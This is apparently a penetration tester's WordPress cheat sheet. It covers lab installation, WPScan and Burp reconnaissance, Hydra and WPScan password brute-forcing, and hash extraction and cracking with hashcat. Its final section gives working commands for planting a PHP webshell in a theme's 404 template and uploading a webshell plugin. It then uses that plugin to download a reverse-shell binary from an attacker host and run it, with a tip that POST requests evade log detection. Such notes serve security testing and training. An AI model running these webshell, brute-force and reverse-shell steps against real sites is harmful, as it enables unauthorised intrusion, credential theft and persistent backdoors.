WordPress

WordPress is a Content Management System (CMS).

Testing WordPress
Installation
Update
Config
Recon
Exploits
Bruteforce
WPScan
Database
Webshells

Testing WordPress

Test for outdated plugins

Use WPScan to list plugins.

Test for XMLRPC exposure

TO COMPLETE

Test for exposed admin portal

From Enumerate Infrastructure and Application Admin Interfaces (WSTG-CONF-05, OWASP Testing Guide):

wp-admin/
wp-admin/about.php
wp-admin/admin-ajax.php
wp-admin/admin-db.php
wp-admin/admin-footer.php
wp-admin/admin-functions.php
wp-admin/admin-header.php

Using Burp Suite

  • Install the WordPress Scanner extension from the BApp Store.
  • Browse WordPress sites through Burp proxy.
  • Vulnerable plugins and themes will appear on the issue list. Issues will also appear inside Scanner tab. Interesting things will be highlighted.

Install WordPress on Kali Linux

Download WordPress, copy files to Apache’s root directory

wget -O /tmp/wordpress.tar.gz https://wordpress.org/latest.tar.gz
sudo tar -xzvf /tmp/wordpress.tar.gz -C /var/www/html/
sudo chown -R www-data.www-data /var/www/html/wordpress

Start Apache and MySQL

sudo service apache2 start
sudo service mysqld start

Create the WordPress database

Change the password!

sudo mysql
CREATE DATABASE wordpress;
GRANT SELECT,INSERT,UPDATE,DELETE,CREATE,DROP,ALTER
ON wordpress.*
TO wordpress@localhost
IDENTIFIED BY 'password';
FLUSH PRIVILEGES;
quit

Install WordPress

  • Open a browser: http://127.0.0.1/wordpress/wp-admin/setup-config.php
  • Choose English
Database name: wordpress
User name: wordpress
Password: ENTER ONE FROM THE DATABASE
Database host: localhost
Table prefix: wp_

Access the website at http://127.0.0.1/wordpress/

Change max file size for upload (for importing files of other WordPress site)

sudo nano /etc/php/8.1/apache2/php.ini
# upload_max_filesize = 2M
upload_max_filesize = 20M
sudo service apache2 reload

Fix permalinks not found error

sudo a2enmod rewrite
sudo nano /etc/apache2/apache2.conf

Change AllowOverride to “All” instead of “None”.

<Directory /var/www/>
        Options Indexes FollowSymLinks
        AllowOverride All
        Require all granted
</Directory>
sudo service apache2 restart

Update WordPress on Kali Linux

The update process requires an FTP server on the web server.

Not recommended to use root as an FTP user account.

ftp.py

#!/usr/bin/python
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer

authorizer = DummyAuthorizer()
authorizer.add_user("root", "MYPASSWORD", "/var/www/html/wordpress", perm="elradfmwMT")

handler = FTPHandler
handler.authorizer = authorizer

server = FTPServer(("127.0.0.1", 21), handler)
server.serve_forever()
./ftp.py

Log in to the WordPress dashboard, and click on Updates.

Configuration Files

wp-config.php contains database credentials.

/var/www/html/wp-config.php

For troubleshooting, see Debugging in WordPress.

Recon

Exploits

Search for “WordPress” or plugin name in the Exploit Database.

WordPress Plugin WP Feed – ‘nid’ SQL Injection

https://www.exploit-db.com/exploits/38624

http://somedomain.com/wp-content/plugins/feed/news_dt.php?nid=[Sql]

Bruteforce login

Try user “admin” first.

Hydra – specific user

See Hydra.

IP=x.x.x.x
WL=/usr/share/wordlists/rockyou.txt
SUCCESS_MSG="302 Found"
COOKIES="wordpress_test_cookie=WP+Cookie+check"
hydra $IP http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3a//${IP}/wp-admin/&testcookie=1:S=$SUCCESS_MSG:H=Cookie: ${COOKIES}" -l admin -P $WL -vV -f

WPScan – specific user

# --password-attack: wp-login, xmlrpc, xmlrpc-multicall
URL="http://x.x.x.x/wp"
WL=/usr/share/wordlists/rockyou.txt
wpscan --url $URL -P $WL -U admin --password-attack wp-login

WPScan

WordPress Vulnerability Scanner.

Installation

Can also be downloaded on Github.

sudo apt install wpscan

Custom environment variables for commands

DIR="~/Documents"
URL="http://someurl.com"
WL="/usr/share/wordlists/rockyou.txt"

Help

wpscan --help

Update the database

wpscan --update

Do ‘non-intrusive’ checks

wpscan --url $URL --log $DIR/wpscan_`date +"%Y%m%d_%H%M"`

List vulnerable plugins

wpscan --url $URL --enumerate vp --log $DIR/wpscan_`date +"%Y%m%d_%H%M"`

Enumerate installed plugins …

wpscan --url $URL --enumerate p --log $DIR/wpscan_`date +"%Y%m%d_%H%M"`

Enumerate installed themes …

wpscan --url $URL --enumerate t --log $DIR/wpscan_`date +"%Y%m%d_%H%M"`

Enumerate users …

wpscan --url $URL --enumerate u -o $DIR/wpscan_`date +"%Y%m%d_%H%M"`

All Plugins (ap), All Themes (at), Config backups (cb), Db exports (dbe)

wpscan --url $URL --enumerate ap,at,cb,dbe

WP Enum (Authenticated)

  • Log in the WordPress control panel at /wp-admin
  • Click on Tools->Site Health.
  • Click on Info tab.
  • Click on Server.

WP Database

mysql -u root -p wordpress

Extract usernames and password hashes

select user_login, user_pass from wp_users;

Crack hashes with Hashcat, use hash type 400.

HASH=hash.txt
TYPE=400
WL=/usr/share/wordlists/rockyou.txt
hashcat -m $TYPE -a 0 $HASH $WL
hashcat -m $TYPE -a 0 $HASH $WL --show

Change user password

update wp_users set user_pass=MD5('admin') where user_login='admin';

Webshells & Reverse shells

Webshell in 404 Not Found

  • Log into WordPress at /wp-admin.
  • Click on Appearance->Editor.
  • Click on 404 Template.
  • Add code at the end of the file. Keep the rest of the code.
<?php echo "<p>Hacked</p>";?>
<?php passthru($_REQUEST[myprecious]); ?>

To execute commands, visit a post id that does not exist or the theme 404 page.

http://x.x.x.x/?p=10000&myprecious=whoami
http://x.x.x.x/wp-content/themes/twentyfifteen/404.php&myprecious=whoami

Install a Web-Shell Plugin

Seclists contains a Web-Shell plugin and is already in Kali Linux.

Zip the plugin code

cd /usr/share/seclists/Web-Shells/WordPress
sudo zip plugin-shell.zip plugin-shell.php

Install the plugin

  • Log into WordPress at /wp-admin.
  • Click on Plugins. Click on Add New.
  • Click on Upload Plugin. Click on Browse, select the plugin-shell.zip file and click Open. Click Install Now.

No need to Activate the plugin.

Test the plugin

Plugin documentation suggests to use POST requests to evade detection in log files 😉

curl http://example.com/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=whoami

Upload a reverse shell payload and execute it

Generate a reverse shell and start a listener. See Msfvenom.

python3 -m http.server 80
curl http://x.x.x.x/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=wget%20-O%20rev.elf%20http://KALI_IP/rev.elf

# Do not forget to encode the "+" sign using %2b
curl http://x.x.x.x/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=chmod%20u%2bx%20rev.elf

curl http://x.x.x.x/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=ls%20-la

curl http://x.x.x.x/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=./rev.elf